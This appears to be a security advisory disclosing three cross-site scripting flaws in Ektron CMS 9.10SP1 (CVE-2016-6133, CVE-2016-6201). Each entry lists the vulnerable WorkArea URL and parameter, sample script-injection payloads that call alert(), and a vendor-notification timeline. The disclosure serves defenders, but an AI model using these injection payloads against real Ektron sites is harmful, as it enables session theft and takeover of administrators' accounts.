Ektron CMS version 9.10SP1 suffers from multiple cross site scripting vulnerabilities.
3902fd0794c6c9915b7128a38de21d8c# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version: 9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia, Edmund Goh
# CVE ID: CVE-2016-6133
# PROOF OF CONCEPT
Vulnerable URL:
/WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033
# VULNERABLE PARAMETERS:
- folder_id
# SAMPLE PAYLOAD
- ',1);});alert(1);//
Or
- <script>alert(1)</script>
# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure
=================================================================
# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version: 9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia
# CVE ID: CVE-2016-6133
# PROOF OF CONCEPT
Vulnerable URL:
/WorkArea/SelectUserGroup.aspx?action=Report&rptStatus
# VULNERABLE PARAMETERS:
- rptStatus
# SAMPLE PAYLOAD
- </script><script>alert(0x0004EA)</script>
# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure
=================================================================
# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version: 9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia
# CVE ID: CVE-2016-6201
# PROOF OF CONCEPT
Vulnerable URL:
/WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0
# VULNERABLE PARAMETERS:
- ContType
# SAMPLE PAYLOAD
- %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp
# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure